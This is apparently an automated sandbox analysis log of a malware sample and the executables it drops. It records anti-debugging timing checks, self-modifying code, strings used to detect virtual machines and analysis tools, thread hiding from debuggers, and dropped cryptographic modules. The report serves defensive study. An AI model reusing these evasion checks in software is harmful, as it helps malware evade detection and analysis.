Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A08D0 second address: 52A0911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ecx, 2E2E7239h 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 jmp 00007F8480743932h 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F848074392Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0911 second address: 52A0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0915 second address: 52A091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A091B second address: 52A0921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0921 second address: 52A0948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, dl 0x00000011 mov edi, ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0948 second address: 52A096A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F848150386Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A096A second address: 52A0986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F848074392Fh 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 72E96C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8E281D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 966F64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 80E96C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 9C281D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A46F64 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_053203B3 rdtsc

0_2_053203B3

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 428	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1412	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 517	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2460	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_7-17370

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

API coverage: 1.9 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5264	Thread sleep time: -60030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5352	Thread sleep count: 428 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5352	Thread sleep time: -856428s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5084	Thread sleep count: 304 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5084	Thread sleep time: -9120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1732	Thread sleep count: 1412 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1732	Thread sleep time: -2825412s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5736	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5476	Thread sleep count: 517 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5476	Thread sleep time: -1034517s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6528	Thread sleep count: 2460 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6528	Thread sleep time: -4922460s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3636	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7436	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7204	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\dxdiag.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\dxdiag.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\System32\dxdiag.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12C9280 FindFirstFileExW,FindClose,	7_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12C9280 FindFirstFileExW,FindClose,	8_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_00007FF7E12E1874

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 8_2_00007FF8B7FF1230 GetSystemInfo,

8_2_00007FF8B7FF1230

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: skotes.exe, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray.exe
Source: samat.exe, 00000007.00000003.2990422238.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dvmusrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dvmwaretray.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dqemu-ga.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dVMware SVGA 3D
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dvboxtray.exe
Source: samat.exe, 00000008.00000002.4559869878.000001BCCC8CB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522921844.000001BCCC8C1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4548533682.000001BCCC8CB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4537138300.000001BCCC8C6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8C4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWg
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dvmtoolsd.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dvboxservice.exe
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dro.kernel.qemu
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware SVGA 3D
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Video
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dvmsrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dMicrosoft Hyper-V Video
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dvmwareuser.exe
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ro.kernel.qemu
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice.exe
Source: file.exe, 00000000.00000002.2104728384.00000000008BD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2148371254.000000000099D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
